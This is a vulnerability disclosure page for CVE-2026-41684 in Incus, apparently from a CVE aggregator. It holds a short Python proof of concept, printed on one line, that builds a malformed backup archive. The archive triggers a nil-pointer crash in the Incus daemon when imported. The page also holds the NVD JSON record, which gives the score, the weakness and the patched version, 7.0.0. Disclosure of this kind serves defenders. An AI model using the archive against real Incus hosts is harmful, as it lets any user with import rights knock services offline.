CVE-2026-41684

# This is a conceptual PoC to generate a malicious backup archive structure. # It creates a tarball with a valid index.yaml but a malformed legacy backup.yaml. import tarfile import io import yaml # 1. Create a valid inline index.yaml index_data = { 'config': {}, 'container': None, # Valid struct for inline 'pool': 'default' } index_yaml = yaml.dump(index_data) # 2. Create a malformed legacy backup.yaml (missing container section) # This simulates the payload that triggers the nil pointer dereference legacy_data = { 'config': {}, # 'container' key is intentionally missing or malformed } legacy_yaml = yaml.dump(legacy_data) # 3. Build the tar archive in memory with tarfile.open("malicious_backup.tar.gz", "w:gz") as tar: # Add valid inline config index_bytes = index_yaml.encode('utf-8') index_info = tarfile.TarInfo(name='backup/index.yaml') index_info.size = len(index_bytes) tar.addfile(index_info, io.BytesIO(index_bytes)) # Add malformed legacy config legacy_bytes = legacy_yaml.encode('utf-8') legacy_info = tarfile.TarInfo(name='backup/container/backup.yaml') legacy_info.size = len(legacy_bytes) tar.addfile(legacy_info, io.BytesIO(legacy_bytes)) print("Malicious backup archive generated: malicious_backup.tar.gz") # An attacker would upload this file via the Incus API import endpoint.

{"cve": {"id": "CVE-2026-41684", "sourceIdentifier": "[email protected]", "published": "2026-05-07T14:16:03.350", "lastModified": "2026-05-07T19:51:01.190", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Incus is a system container and virtual machine manager. Prior to version 7.0.0, backup.GetInfo() trusts the inline backup/index.yaml config when present and only falls back to parsing the legacy backup/container/backup.yaml file if result.Config == nil. As a result, an archive can carry a valid inline config that passes the initial import preflight while also carrying a malformed legacy backup/container/backup.yaml file that is reparsed later from the restored file system. ParseConfigYamlFile() accepts YAML documents with no container section, and multiple downstream consumers then dereference. Container without checking for nil. Confirmed examples in the instance restore and import flow include backup.UpdateInstanceConfig() and internalImportFromBackup(). An authenticated user with permission to import instance backups may be able to crash the Incus daemon with a crafted backup archive whose inline backup/index.yaml is valid but whose extracted legacy backup.yaml omits container. The crash occurs in the restore path after archive extraction has begun. This issue has been patched in version 7.0.0."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-476"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:linuxcontainers:incus:*:*:*:*:*:*:*:*", "versionEndExcluding": "7.0.0", "matchCriteriaId": "CF8EBB4B-C1F0-44C5-B063-9CF8EB6E0972"}]}]}], "references": [{"url": "https://github.com/lxc/incus/releases/tag/v7.0.0", "source": "[email protected]", "tags": ["Patch", "Product"]}, {"url": "https://github.com/lxc/incus/security/advisories/GHSA-x5r6-jr56-89pv", "source": "[email protected]", "tags": ["Exploit", "Mitigation", "Vendor Advisory"]}]}}